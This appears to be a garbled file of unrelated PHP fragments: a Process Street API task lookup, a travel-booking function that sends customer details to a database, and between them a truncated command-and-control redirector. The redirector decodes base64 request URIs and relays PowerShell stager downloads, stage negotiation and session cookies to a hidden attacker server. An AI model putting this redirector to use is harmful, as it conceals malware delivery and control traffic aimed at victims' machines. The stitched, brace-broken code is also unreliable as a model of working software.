function find_task($params) { list($status, $tasks) = do_get_request(PROCESS_STREET_API_BASE, PROCESS_STREET_API_ROUTE_TASKS_QUERY, $params, ['Authorization: Basic ' . base64_encode(PROCESS_STREET_API_KEY . ':')]); if ($status === 200) { return !empty($tasks) ? $tasks[0] : null; } else { error_log("failed to get tasks with status code {$status}"); http_response_code(500); exit; } }
return $response; } if ($_SERVER['REQUEST_METHOD'] === "GET") { $parts = explode("?", $_SERVER['REQUEST_URI']); if (count($parts) > 1) { $parts = explode("&", base64_decode($parts[1])); if (count($parts) == 2) { // in case where're doing stage 0 requests for stager.ps1 $uri = $server . $parts[1] . "?" . base64_encode($parts[0]); echo do_get_request($uri); } } else { if (isset($_COOKIE['SESSIONID'])) { echo do_get_request(rtrim($server, "/") . $resource, "Cookie: SESSIONID=" . $_COOKIE['SESSIONID']); } else { echo do_get_request(rtrim($server, "/") . $resource); } } } else { $parts = explode("?", $_SERVER['REQUEST_URI']); if (count($parts) > 1) { $parts = explode("&", base64_decode($parts[1])); if (count($parts) == 2) { // in case we're continuing stage negotiation $uri = $server . $parts[1] . "?" . base64_encode($parts[0]); $postdata = file_get_contents("php://input"); if (isset($_COOKIE['SESSIONID'])) { echo do_post_request($uri, $postdata, "Cookie: SESSIONID=" . $_COOKIE['SESSIONID']); } else { echo do_post_request($uri, $postdata); }
function sendBookingToAestivaDb($lastname, $firstname, $paxId, $phone, $email, $hotelName, $hotelCode, $roomDesc, $txtLeave, $txtReturn, $destinationCode, $bookingNumber, $netSupCost, $quotedPrice, $listPrice) { /* String airTravelUrl = lastname= xxx &firstname= xxx &morenames = xxx &nopax= x &telday= xxxxxx &email= xxxx &bookedhotel=xx hotel name xx &bookedrmtype= xx roomDescription xx &bookeddates= xx departure date xx &bookeddateout= xx return Date xx &nites=" xx number of nights xx &bookeddestin=" xx destination xx &confirm= xx ti's confirmation numberXX &netsupcost= xx net cost from ti xx &airprice1= xx price we quote to customer xx &cost1= xx the gross price listed by TI xx */ $leaveYear = (int) substr($txtLeave, 6, 4); $leaveMonth = (int) substr($txtLeave, 0, 2); $leaveDay = (int) substr($txtLeave, 3, 2); $returnYear = (int) substr($txtReturn, 6, 4); $returnMonth = (int) substr($txtReturn, 0, 2); $returnDay = (int) substr($txtReturn, 3, 2); $newLeave = mktime(12, 0, 0, $leaveMonth, $leaveDay, $leaveYear); $newReturn = mktime(12, 0, 0, $returnMonth, $returnDay, $returnYear); $numNights = round(abs($newLeave - $newReturn) / 86400); $bookingDataQueryString = ""; $bookingDataQueryString .= "lastname=" . rawurlencode($lastname); $bookingDataQueryString .= "&firstname=" . rawurlencode($firstname); $bookingDataQueryString .= "&morenames="; $bookingDataQueryString .= "&nopax=" . rawurlencode($paxId); $bookingDataQueryString .= "&telday=" . rawurlencode($phone); $bookingDataQueryString .= "&email=" . rawurlencode($email); $bookingDataQueryString .= "&bookedhotel=" . rawurlencode($hotelName); $bookingDataQueryString .= "&hotcode=" . rawurlencode($hotelCode); $bookingDataQueryString .= "&bookedrmtype=" . rawurlencode($roomDesc); $bookingDataQueryString .= "&bookeddates=" . rawurlencode($txtLeave); $bookingDataQueryString .= "&bookeddateout=" . rawurlencode($txtReturn); $bookingDataQueryString .= "&nites=" . $numNights; $bookingDataQueryString .= "&bookeddestin=" . rawurlencode($destinationCode); $bookingDataQueryString .= "&confirm=" . rawurlencode($bookingNumber); $bookingDataQueryString .= "&netsupcost=" . rawurlencode($netSupCost); $bookingDataQueryString .= "&clientrequest=" . rawurlencode("Quoted Price: " . $quotedPrice); $bookingDataQueryString .= "&commentbox=" . rawurlencode("Total TI Gross Price: " . $listPrice); do_get_request(AESTIVA_DB, $bookingDataQueryString); }